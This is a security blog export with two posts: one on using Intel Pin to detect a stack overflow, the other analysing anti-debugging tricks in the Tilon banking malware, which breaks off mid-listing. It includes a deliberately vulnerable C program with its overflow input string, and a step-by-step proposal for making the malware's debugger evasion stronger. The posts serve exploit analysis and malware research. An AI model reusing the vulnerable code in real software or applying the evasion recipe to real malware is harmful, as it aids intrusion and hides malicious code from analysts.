<br />giuliahttp://www.blogger.com/profile/12995367052667481710noreply@blogger.com6tag:blogger.com,1999:blog-8573685359056491736.post-69341160959380179682013-03-10T17:18:00.000-07:002013-03-10T17:28:57.872-07:00Binary Instrumentation for Exploit Analysis Purposes (part 1)<span style="font-family: Verdana, sans-serif; font-size: large;"><u>Introduction.</u></span><br />
<br />
<span style="font-family: Verdana, sans-serif;">This article is about binary instrumentation over various exploit scenarios. In particular, we are going to use <a href="http://software.intel.com/en-us/articles/pin-a-dynamic-binary-instrumentation-tool">Pin</a>, a software developed by Intel, to show how this approach can help with the analysis.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Pin is employed to create dynamic program analysis tools, the so called "Pintools". Once executed, a Pintool acts almost like a virtual machine that runs the code from a target executable image and rebuilds it by adding the code you need to perform your own analysis. For example, you can: install a callback that is invoked every time a single instruction is executed; inspect registers; alter the context and so on.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><u>Note</u>: I've tested the whole work using Windows XP 32 bit and Visual Studio 2010.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /><span style="font-size: large;"><u>How to compile and execute a Pintool.</u></span></span><br />
<span style="font-family: Verdana, sans-serif;"><u><br /></u></span>
<span style="font-family: Verdana, sans-serif;">The simplest way to compile a Pintool is to use the Visual Studio project provided by Intel, located in the Pin folder at: \source\tools\MyPinTool .</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">To run it, simply type: </span><span style="font-family: 'Courier New', Courier, monospace;">pin -t <your_pintool.dll> -- <application_path>.</span><br />
<span style="font-family: Verdana, sans-serif;">In this way your Pintool will be executed within the application you want to test.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<div>
<span style="font-family: Verdana, sans-serif; font-size: large;"><u>How to code a Pintool: a (very) short description.</u></span></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">A Pintool begins with a standard initialization of the Pin engine by using the "PIN_Init()" function; then, you need to register the callbacks for the events you want to handle. </span><br />
<span style="font-family: Verdana, sans-serif;">For instance, you can use:</span><br />
<ul>
<li><span style="font-family: Verdana, sans-serif;">"INS_AddInstrumentFunction()" to register a callback that is invoked at every executed instruction;</span></li>
<li><span style="font-family: Verdana, sans-serif;">"IMG_AddInstrumentFunction()" to register a callback that notifies you every time an executable module is loaded;</span></li>
<li><span style="font-family: Verdana, sans-serif;">"PIN_AddThreadStartFunction()" and "</span><span style="font-family: Verdana, sans-serif;">PIN_AddThreadFiniFunction()"</span><span style="font-family: Verdana, sans-serif;"> to </span><span style="font-family: Verdana, sans-serif;">handle thread creation and ending.</span></li>
</ul>
<br />
<span style="font-family: Verdana, sans-serif;">In particular, if you register a callback with </span><span style="font-family: Verdana, sans-serif;">"INS_AddInstrumentFunction()"</span><span style="font-family: Verdana, sans-serif;">, you can then use the "INS_InsertCall()" function from it and register other callbacks.</span><br />
<span style="font-family: Verdana, sans-serif;">These callbacks have a special property: they can be invoked before or after an instruction is executed. </span><span style="font-family: Verdana, sans-serif;">Also, you can pass to them any kind of data, including the value of specific registers (the instruction pointer, for instance), memory addresses and so on.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Finally, you'll have to use "PIN_AddFiniFunction()" to register the callback that is invoked when the application quits.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Once all the callbacks are registered, you can start the instrumented program by calling "PIN_StartProgram()".</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Your Pintool can filter specific conditions with an incredibly accurate resolution, but bear in mind that the performances may degrade badly depending on what kind of actions you choose to do.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">As an example, let's consider again the </span><span style="font-family: Verdana, sans-serif;">"INS_AddInstrumentFunction()"</span><span style="font-family: Verdana, sans-serif;">, and suppose that we are going to register a callback that logs every executed instruction to a file: if you are distracted, you might generate a file I/O for every single instruction, which is very inefficient. Another operation that will reduce your Pintool's performances, if called frequently, is the disassembler functionality.</span><br />
<span style="font-family: Verdana, sans-serif;">So be careful: your instrumented application can run almost at realtime speed if your Pintool is well written, but a bad implementation may slow down your application up to the point where it will take minutes to run.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<span style="font-family: Verdana, sans-serif; font-size: large;"><u>A basic Pintool.</u></span><br />
<br />
<span style="font-family: Verdana, sans-serif;">Here is a very basic Pintool to which we will add more specific functions later.</span><br />
<style type="text/css">
pre.CICodeFormatter{
font-family:arial;
font-size:12px;
border:1px dashed #CCCCCC;
width:99%;
height:auto;
overflow:auto;
background:#f0f0f0;
line-height:20px;
background-image:URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RLiAlfLucI_qoHJvHaLwvgXby8Z5TK-aqUneDA06kscMW-ILm4a94iJq4qsFWJQEUtkkWWtnA6woWdwoPT2LE4DB2URdsSOOa3-smdrFFQB1oG2jam0NLQaJYk7Z95MyTJNdoHSDytEn/s320/codebg.gif);
padding:0px;
color:#000000;
text-align:left;
}
pre.CICodeFormatter code{
color:#000000;
word-wrap:normal;
}
</style>
<br />
<pre class="CICodeFormatter"><code class="CICodeFormatter"> #include <stdio.h>
#include "pin.H"
namespace WINDOWS
{
#include <windows.h>
}
FILE * OutTrace;
ADDRINT ExceptionDispatcher = 0;
/* ===================================================================== */
/* Instrumentation functions */
/* ===================================================================== */
VOID DetectEip(ADDRINT AddrEip, ...)
{
if(AddrEip == ExceptionDispatcher)
{
fprintf(OutTrace, "%08x Exception occurred!\n", AddrEip);
}
// Here you can call the functions that we will add
//(you should also remove the next line to avoid tracing every instruction being executed)
fprintf(OutTrace, "%08x \n", AddrEip);
}
// Pin calls this function every time a new instruction is encountered
VOID Instruction(INS Ins, VOID *v)
{
// Insert a call to DetectEip before every instruction, and pass it the IP
INS_InsertCall(Ins, IPOINT_BEFORE, (AFUNPTR)DetectEip, IARG_INST_PTR, IARG_END);
}
VOID ImageLoad(IMG Img, VOID *v)
{
fprintf(OutTrace, "Loading module %s \n", IMG_Name(Img).c_str());
fprintf(OutTrace, "Module Base: %08x \n", IMG_LowAddress(Img));
fprintf(OutTrace, "Module end: %08x \n", IMG_HighAddress(Img));
fflush(OutTrace);
}
/* ===================================================================== */
/* Finalization function */
/* ===================================================================== */
// This function is called when the application exits
VOID Fini(INT32 code, VOID *v)
{
fprintf(OutTrace, "Terminating execution\n");
fflush(OutTrace);
fclose(OutTrace);
}
/* ===================================================================== */
/* Print Help Message */
/* ===================================================================== */
INT32 Usage()
{
PIN_ERROR("Init error\n");
return -1;
}
/* ===================================================================== */
/* Main */
/* ===================================================================== */
int main(int argc, char * argv[])
{
OutTrace = fopen("itrace.txt", "wb");
WINDOWS::HMODULE hNtdll;
hNtdll = WINDOWS::LoadLibrary("ntdll");
ExceptionDispatcher = (ADDRINT)WINDOWS::GetProcAddress(hNtdll, "KiUserExceptionDispatcher");
fprintf(OutTrace, "Exception handler address: %08x \n", ExceptionDispatcher);
WINDOWS::FreeLibrary(hNtdll);
// Initialize pin
if (PIN_Init(argc, argv))
{
Usage();
}
// Register Instruction to be called to instrument instructions
INS_AddInstrumentFunction(Instruction, 0);
// Register ImageLoad to be called at every module load
IMG_AddInstrumentFunction(ImageLoad, 0);
// Register Fini to be called when the application exits
PIN_AddFiniFunction(Fini, 0);
// Start the program, never returns
fprintf(OutTrace, "Starting Pintool\n");
PIN_StartProgram();
return 0;
}
</code></pre>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Verdana, sans-serif;">It basically logs to a file: the address of each instruction being executed; all the exceptions occurred; the name of each module being loaded, including the base and the end address.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">I have also put a comment in the "DetectEip()" function, to specify where you can call the functions we will add later.</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Verdana, sans-serif; font-size: large;"><u>First exploit scenario: stack overflow.</u></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">As a first case study, we are going to consider a specially crafted sample:</span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<style type="text/css">
pre.CICodeFormatter{
font-family:arial;
font-size:12px;
border:1px dashed #CCCCCC;
width:99%;
height:auto;
overflow:auto;
background:#f0f0f0;
line-height:20px;
background-image:URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RLiAlfLucI_qoHJvHaLwvgXby8Z5TK-aqUneDA06kscMW-ILm4a94iJq4qsFWJQEUtkkWWtnA6woWdwoPT2LE4DB2URdsSOOa3-smdrFFQB1oG2jam0NLQaJYk7Z95MyTJNdoHSDytEn/s320/codebg.gif);
padding:0px;
color:#000000;
text-align:left;
}
pre.CICodeFormatter code{
color:#000000;
word-wrap:normal;
}
</style>
<br />
<pre class="CICodeFormatter"><code class="CICodeFormatter"> #include <stdio.h>
#include <string.h>
unsigned char Var[2] = {0xFF, 0xE4};
void GetPassword(){
char Password[12];
memset(Password, 0, sizeof(Password));
printf("Insert your password (max 12 chars):\n");
int i = -1;
do{
i++;
Password[i] = getchar();
} while (Password[i] != 0x0D && Password[i] != 0x0A);
Password[i] = 0;
printf("Your password is: %s \n", Password);
}
void main(void){
GetPassword();
}
</code></pre>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Before compiling and linking it (I used Visual Studio 10), be sure to disable all the security options (stack canaries, DEP, ASLR) and to set the Base Address to 0x41410000.</span><br />
<span style="font-family: Verdana, sans-serif;">I know it might sound a little unreal, and in fact... it is! But don't worry, as I said before, this is just the simplest example that crossed my mind and we are going to use it as a first test. Anyway the methodology I'm proposing is very effective and we will see a real case study later.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span><span style="font-family: Verdana, sans-serif;">First, we need to "exploit" this little test: I'll be quick. We can open the executable with Ollydbg and debug it until we find the "getchar" function, that grabs an input string. Then, we enter the following (in my case at least, you should check the parameters explained later if you want to be 100% sure!): "</span><span style="font-family: 'Courier New', Courier, monospace;">123456789abcAAAA 0AABBBBBBBBBBBBBBBBBBB</span><span style="font-family: Verdana, sans-serif;">" (remove the " ").</span><br />
<br />
<span style="font-family: Verdana, sans-serif;">What's the meaning of it? We are going to fill all the 12 required bytes, and because of the lack of control over the size of the input, we also type:</span><br />
<br />
<ul>
<li><span style="font-family: Verdana, sans-serif;">"AAAA", that is the padding added by the compiler;</span></li>
<li><span style="font-family: Verdana, sans-serif;">" 0AA", that corresponds to the 0x41413020 address (= "AA0 ", because of the endianness) where the "JMP ESP" instruction (= "0xFF 0xE4" as an opcode) is located --- this will overwrite the return address of the "main" function;</span></li>
<li><span style="font-family: Verdana, sans-serif;">a bunch of "B", that corresponds to the "INC EDX" instruction --- this is where you will usually put the shellcode, but as a test every valid instruction will be fine!</span></li>
</ul>
<br />
<span style="font-family: Verdana, sans-serif;">Now that you have tested that the string I provided works also in your case, or you have built your own valid string, we are ready to analyze our first exploit scenario:</span><span style="font-family: Verdana, sans-serif;"> a simple stack overflow. How can we detect that?</span><br />
<span style="font-family: Verdana, sans-serif;">The most natural idea is to perform a check over EIP to see whether its value corresponds to a non-executable area (the stack in this case).</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">The Pintool maintains two variables containing the base and end address of the module being executed.</span><br />
<span style="font-family: Verdana, sans-serif;">If the value of the EIP isn't in the range specified by these two addresses, Pintool accesses the modules list maintained by Pin, looking for a new executable module in which the value of EIP resides (for instance, after an API call). </span><span style="font-family: Verdana, sans-serif;">When such a module is found, the variables containing the base and end address are updated (making it the current module).</span><br />
<span style="font-family: Verdana, sans-serif;">If the value of EIP isn't located within any of the modules, the Pintool reports it as suspicious and logs the list of the last 1000 executed values of EIP.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Here is the code to do that:</span><br />
<style type="text/css">
pre.CICodeFormatter{
font-family:arial;
font-size:12px;
border:1px dashed #CCCCCC;
width:99%;
height:auto;
overflow:auto;
background:#f0f0f0;
line-height:20px;
background-image:URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RLiAlfLucI_qoHJvHaLwvgXby8Z5TK-aqUneDA06kscMW-ILm4a94iJq4qsFWJQEUtkkWWtnA6woWdwoPT2LE4DB2URdsSOOa3-smdrFFQB1oG2jam0NLQaJYk7Z95MyTJNdoHSDytEn/s320/codebg.gif);
padding:0px;
color:#000000;
text-align:left;
}
pre.CICodeFormatter code{
color:#000000;
word-wrap:normal;
}
</style>
<br />
<pre class="CICodeFormatter"><code class="CICodeFormatter"> #define LAST_EXECUTED 1000
ADDRINT LastExecutedBuf[LAST_EXECUTED];
UINT32 LastExecutedPos;
ADDRINT CurrentModuleBase, CurrentModuleEnd;
bool IsModuleFound(ADDRINT Addr)
{
for(IMG Img = APP_ImgHead(); IMG_Valid(Img); Img = IMG_Next(Img))
{
if(Addr >= IMG_LowAddress(Img) &&
Addr <= IMG_HighAddress(Img)) // <=, not <
{
CurrentModuleBase = IMG_LowAddress(Img);
CurrentModuleEnd = IMG_HighAddress(Img);
return true;
}
}
return false;
}
void CheckEipModule(ADDRINT AddrEip)
{
int i;
if(! (AddrEip >= CurrentModuleBase && AddrEip < CurrentModuleEnd) )
{
if(!IsModuleFound(AddrEip))
{
// eip is no within an executable image!
fprintf(OutTrace, "EIP detected not within an executable module: %08x \n", AddrEip);
fprintf(OutTrace,"Dumping list of previously executed EIPs \n");
for(i = LastExecutedPos; i < LAST_EXECUTED; i++)
{
fprintf(OutTrace, "%08x \n", LastExecutedBuf[i]);
}
for(i = 0; i < LastExecutedPos; i++)
{
fprintf(OutTrace, "%08x \n", LastExecutedBuf[i]);
}
fprintf(OutTrace, "%08x \n --- END ---", AddrEip);
fflush(OutTrace);
WINDOWS::ExitProcess(0);
}
}
LastExecutedBuf[LastExecutedPos] = AddrEip;
LastExecutedPos++;
if(LastExecutedPos >= LAST_EXECUTED)
{
// circular logging
LastExecutedPos = 0;
}
}
</code></pre>
<br />
<span style="font-family: Verdana, sans-serif;">You can simply copy it in the provided basic Pintool, but remember to also add the line:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">CheckEipModule(AddrEip);</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">in the "DetectEip()" function (where specified by the comment).</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Compile/link the Pintool and execute it.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Once executed, it will generate a log (I've cut some lines!) like the following:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">Exception handler address: 7c91eaec </span><br />
<span style="font-family: Courier New, Courier, monospace;">Starting Pintool</span><br />
<span style="font-family: Courier New, Courier, monospace;">Loading module C:\...\StackBof.exe </span><br />
<span style="font-family: Courier New, Courier, monospace;">Module Base: 41410000 </span><br />
<span style="font-family: Courier New, Courier, monospace;">Module end: 41414fff </span><br />
<span style="font-family: Courier New, Courier, monospace;">Loading module C:\WINDOWS\system32\kernel32.dll </span><br />
<span style="font-family: Courier New, Courier, monospace;">Module Base: 7c800000 </span><br />
<span style="font-family: Courier New, Courier, monospace;">Module end: 7c8fefff </span><br />
<span style="font-family: Courier New, Courier, monospace;">Loading module C:\WINDOWS\system32\ntdll.dll </span><br />
<span style="font-family: Courier New, Courier, monospace;">Module Base: 7c910000 </span><br />
<span style="font-family: Courier New, Courier, monospace;">Module end: 7c9c5fff </span><br />
<span style="font-family: Courier New, Courier, monospace;">Loading module C:\WINDOWS\system32\MSVCR100.dll </span><br />
<span style="font-family: Courier New, Courier, monospace;">Module Base: 78aa0000 </span><br />
<span style="font-family: Courier New, Courier, monospace;">Module end: 78b5dfff </span><br />
<span style="font-family: Courier New, Courier, monospace;">EIP detected not within an executable module: 0012ff84 </span><br />
<span style="font-family: Courier New, Courier, monospace;">Dumping list of previously executed EIPs </span><br />
<span style="font-family: Courier New, Courier, monospace;">78ac005f </span><br />
<span style="font-family: Courier New, Courier, monospace;">78ac0061 </span><br />
<span style="font-family: Courier New, Courier, monospace;">78ac0062 </span><br />
<span style="font-family: Courier New, Courier, monospace;">78ac0063 </span><br />
<span style="font-family: Courier New, Courier, monospace;">78ac0069 </span><br />
<div>
<span style="font-family: Courier New, Courier, monospace;">...</span></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">78ab0cd7 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">78ab0cd8 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">78b05747 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">4141104f </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">41411052 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">41411053 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">41411054 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">41411056 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">41411057 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">41411059 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">4141105a </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">41413020 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">0012ff84 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> --- END ---</span></div>
</div>
<div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif;">
It's very simple to understand what happened just by reading the log:</div>
<br />
<ul>
<li><span style="font-family: Verdana, sans-serif;">the RET instruction is located at the address "0x4141105A";</span></li>
<li><span style="font-family: Verdana, sans-serif;">it jumps to the overwritten return address, that is the address "0x41413020", where a "JMP ESP" is located;</span></li>
<li><span style="font-family: Verdana, sans-serif;">Pintool successfully detects that we are trying to execute code within a non executable module (that is the "0x0012FF84" address, belonging to the stack).</span></li>
</ul>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif; font-size: large;"><u>Conclusions</u></span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><u><br /></u></span></div>
<div>
<span style="font-family: Verdana, sans-serif;">This was an introductory article on binary instrumentation for exploit analysis purposes and I really hope you liked it! See you for the second part in a few days, where I will discuss another scenario: a real pdf exploit, that makes use of ROP and Heap Spraying.</span></div>
giuliahttp://www.blogger.com/profile/12995367052667481710noreply@blogger.com3tag:blogger.com,1999:blog-8573685359056491736.post-87736155796133437172012-10-25T16:49:00.000-07:002012-10-25T16:49:12.025-07:00Tricky Tilon: disappearing instruction, anti-debugging, deceptions and much more!<span style="font-family: Verdana, sans-serif; font-size: large;"><u>Introduction</u></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">This post is about a sort of anti-debugging trick that I discovered while analyzing a malware named <i>Tilon</i>. Well, to be precise, it's more a deception trick than an anti-debugging one but, as we will see later, it's really easy to tweak it to tamper with debugging.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Tilon is a banker that <a href="http://www.trusteer.com/blog/tilon-son-of-silon">has been spotted by Trusteer</a> in July 2012 and, aside from some pretty standard stuffs, like a <i>Man In The Browser</i> implementation, it's better known for the peculiarity of making use of several evasion techniques. I found one of them, i</span><span style="font-family: Verdana, sans-serif;">n the attempt of digging deeper in its various encryption/packer layers,</span><span style="font-family: Verdana, sans-serif;"> that hasn't been reported yet.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">All the layers are very easy to bypass: they roughly consist of basic crypto operations and UPX compression</span><span style="font-family: Verdana, sans-serif;">. After solving them you will see the following listing:</span><br />
<br />
<span style="background-color: white; font-family: Courier New, Courier, monospace;">...</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white; font-family: Courier New, Courier, monospace;">008D0079 CALL 008D0233</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace;">008D007E CALL 008D04DC</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace;">008D0083 POPAD</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace;">008D0084 ADD ESP,4</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace;">008D0087 MOV EAX,DWORD PTR SS:[EBP+4020BF]</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace;">008D008D JMP EAX</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace;"><br /></span>
<span style="background-color: white; font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Verdana, sans-serif; font-size: large;"><u>Tilon's trick(s)</u></span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Verdana, sans-serif;">So, we have two CALL and one JMP.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">If we step into the first call, we will notice that the malware is going to set an "hook" (it's not properly API hooking as it's only inside the process itself) on the <i>KiUserExceptionDispatcher</i> API (a function of <i>NTDLL.dll</i> that is being called when some types of exception occur) to call (what we will discover to be) a decryption routine.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqQXb8FaAtbUe6ywtFQSCEWvQP5uzZ6dQ1iBDFYH43-6v9BRQzeagnD-h4ufgwVzrRo_kqeQNLd5z6qKUpQVGlMasdSnExJqyhsvKFte1wa5snUPHBluvgSY-kbdnIP7wq4A49kgAZY2s/s1600/hook.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqQXb8FaAtbUe6ywtFQSCEWvQP5uzZ6dQ1iBDFYH43-6v9BRQzeagnD-h4ufgwVzrRo_kqeQNLd5z6qKUpQVGlMasdSnExJqyhsvKFte1wa5snUPHBluvgSY-kbdnIP7wq4A49kgAZY2s/s1600/hook.bmp" /></a></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Pay attention to the code while stepping... As I reminded you before, Tilon is famous for the number of the deception tricks implemented!</span><br />
<span style="font-family: Verdana, sans-serif;">For example, the next call makes use of a well known <a href="http://www.symantec.com/connect/articles/windows-anti-debug-reference"><i>PEB</i> related anti-debugging trick</a>:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">008D04DC MOV EAX,DWORD PTR FS:[18]</span><br />
<span style="font-family: Courier New, Courier, monospace;">008D04E2 MOV EAX,DWORD PTR DS:[EAX+30]</span><br />
<span style="font-family: Courier New, Courier, monospace;">008D04E5 MOVZX EAX,BYTE PTR DS:[EAX+2]</span><br />
<span style="font-family: Courier New, Courier, monospace;">008D04E9 TEST EAX,EAX</span><br />
<span style="font-family: Courier New, Courier, monospace;">008D04EB JNZ SHORT 008D04EE</span><br />
<span style="font-family: Courier New, Courier, monospace;">008D04ED RETN</span><br />
<span style="font-family: Courier New, Courier, monospace;">008D04EE INT3</span><br />
<span style="font-family: Courier New, Courier, monospace;">...</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Finally, there is a jump that brings us to an encrypted code:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjC4ho4CIkkF1MibALY-rey3OTEV1yqZH9u1hSmrhBYqenpjI6xicXAtDCCrXgZcKbvvz-ZGjVs1w6YvfGyJzn7BimtaiDute3mFlPeGfK42o5_0OSigP8qTaXH8yA12hQWoJCv0NILJdE/s1600/encryptedbytes.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjC4ho4CIkkF1MibALY-rey3OTEV1yqZH9u1hSmrhBYqenpjI6xicXAtDCCrXgZcKbvvz-ZGjVs1w6YvfGyJzn7BimtaiDute3mFlPeGfK42o5_0OSigP8qTaXH8yA12hQWoJCv0NILJdE/s1600/encryptedbytes.bmp" /></a></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Access violation, indeed!</span><br />
<span style="font-family: Verdana, sans-serif;">Since there is no <i>Exception Handler</i> installed, one may think that the code has crashed for some reason that he missed and he will restart the debugger to conduct a more precise analysis. On the other hand, if we use <i>Shift+F8</i> the malware will decrypt the code because of the previous "hook"! Finally, it will also delete the "hook" from the <i>KiUserExeceptionDispatcher</i> API and jump to the decrypted bytes.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">So, this is really not an anti-debugging trick, even if it will work fine in some cases, like against emulators, but, let's stay focused: our goal is to fool the debugger... How can we do it? Well, there are surely several ways to do that, the one I have in mind consists of mixing this trick, the <i>PEB</i> one and... one more finding!</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<span style="font-family: Verdana, sans-serif;">Let me explain it briefly: when Tilon generates the exception, by pressing <i>Shift+F8</i> the debugger will execute the first instruction of the "hook", but will break only on the second one.</span><br />
<span style="font-family: Verdana, sans-serif;">Thus we have: </span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">7C91EAEC 68 FA028D00 PUSH 8D02FA <span style="color: #38761d;">; the first instruction is executed...</span></span><br />
<span style="font-family: Courier New, Courier, monospace;">7C91EAF1 C3 RETN <span style="color: #38761d;">; but the debugger will break only here!</span></span><br />
<br />
<br />
<span style="font-family: Verdana, sans-serif;">That gives us the possibility of hiding an instruction!</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Putting the pieces together:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYPeKBBga4XgvbF8siczntpRy6aHuhRtyx2MBZMRvNKEiSaYbFwEggqx0i2LCLkcPwq0l1DZjZGCSGypHOoEuDiXXg-q5QjBwD-s_UdngNa7NJQIfOUhniO9HUb9k2Skg4XLxDgyyicQo/s1600/schema5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="232" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYPeKBBga4XgvbF8siczntpRy6aHuhRtyx2MBZMRvNKEiSaYbFwEggqx0i2LCLkcPwq0l1DZjZGCSGypHOoEuDiXXg-q5QjBwD-s_UdngNa7NJQIfOUhniO9HUb9k2Skg4XLxDgyyicQo/s640/schema5.png" width="640" /></a></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<span style="font-family: Verdana, sans-serif;"><u><br /><span style="font-size: large;">Tilon: you are doing it wrong...!</span></u></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span><span style="font-family: Verdana, sans-serif;">Now I will show you one way to improve the trick in the <i>Tilon</i>'s code:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">STEP 1. We need to change the decryption key with a wrong one and to set a global variable (for instance, </span><span style="font-family: Courier New, Courier, monospace;">00BD0AB0</span><span style="font-family: Verdana, sans-serif;">) containing the address of the decryption routine (in my case </span><span style="font-family: Courier New, Courier, monospace;">008D02FA</span><span style="font-family: Verdana, sans-serif;">).</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">STEP 2. We modify the hook by writing: </span><span style="font-family: Courier New, Courier, monospace;">JMP [008D0AB0]</span><span style="font-family: Verdana, sans-serif;">(this instruction will be hidden)</span><span style="font-family: Courier New, Courier, monospace;">.</span><br />
<br />
<span style="font-family: Verdana, sans-serif;">STEP 3. We modify the <i>PEB</i> trick (inside the last call before the jump to the encrypted bytes; see the listing at the beginning of this blog-entry) in the following way:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">008D0A00 MOV EAX,DWORD PTR FS:[18]</span><br />
<span style="font-family: Courier New, Courier, monospace;">008D0A06 MOV EAX,DWORD PTR DS:[EAX+30]</span><br />
<span style="font-family: Courier New, Courier, monospace;">008D0A09 MOVZX EAX,BYTE PTR DS:[EAX+2]</span><br />
<span style="font-family: Courier New, Courier, monospace;">008D0A0D JNZ SHORT 008D0A19</span><br />
<span style="font-family: Courier New, Courier, monospace;">008D0A0F MOV DWORD PTR DS:[8D0AB0], 8D0A1A <span style="color: #38761d;">; no debugger!</span></span><br />
